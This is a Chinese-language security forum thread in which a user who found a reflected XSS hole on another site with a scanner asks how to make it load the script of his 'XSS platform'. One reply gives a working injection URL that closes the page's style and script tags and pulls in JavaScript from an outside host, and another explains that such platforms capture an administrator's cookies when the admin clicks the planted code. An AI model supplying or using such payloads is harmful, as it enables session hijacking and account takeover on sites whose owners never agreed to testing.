请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 574|回复: 5

[XSS问题] xss弹出来没有内容?

[复制链接]
  • TA的每日心情

    2016-12-11 19:45
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2016-6-13 09:15:44 | 显示全部楼层 |阅读模式
    某站,用netspeak扫描到一个xss
    http://xxx.com/1.html?nsextt=%27"--></style></scRipt><scRipt>netsparker(0x000038)</scRipt>
    这样可以弹,我现在想换成我XSS平台的地址
    应该怎么写?如果有会的大神多给我写几个例子。比如说我的平台js地址为http://www.222xss.com/1.js
    非常感谢
    回复

    使用道具 举报

  • TA的每日心情

    2016-12-11 19:45
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2016-6-13 09:21:07 | 显示全部楼层
    还需要审核,这得多久呀?
  • TA的每日心情
    奋斗
    2016-7-18 19:18
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-6-30 20:43:01 | 显示全部楼层
    xss平台,看里面的功能构成吧,,这种反射性xss和储存性xss不一样,,xss平台里面最重要的功能是打cookie,,,如果你想把打cookie的xss代码往你发的这个反射性xss上面添加企图触发弹窗,,,你还是洗洗睡吧,,
  • TA的每日心情

    昨天 21:38
  • 签到天数: 296 天

    [LV.8]以坛为家I

    发表于 2016-7-2 01:11:42 | 显示全部楼层
    http://xxx.com/1.html?nsextt=%27"--></style></scRipt><scRipt src="http://www.222xss.com/1.js"></scRipt>    :o:o
  • TA的每日心情
    擦汗
    2017-1-1 13:23
  • 签到天数: 41 天

    [LV.5]常住居民I

    发表于 2016-7-27 09:25:40 | 显示全部楼层
    xss平台里面会生成自己的代码,将这个对应的代码找个地方发进去,如果管理员点一下的话,管理员的cookie就会发送到xss平台上,这个貌似一般都是用来存储型的xss
  • TA的每日心情
    开心
    前天 20:23
  • 签到天数: 126 天

    [LV.7]常住居民III

    发表于 2016-7-30 06:54:01 | 显示全部楼层
    请问楼主 测试用这个么 http://xxx.com/1.html?nsextt=%27"--></style></scRipt><scRipt>netsparker(0x000038)</scRipt>

    害羞----
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-22 01:26 , Processed in 0.170835 second(s), 32 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表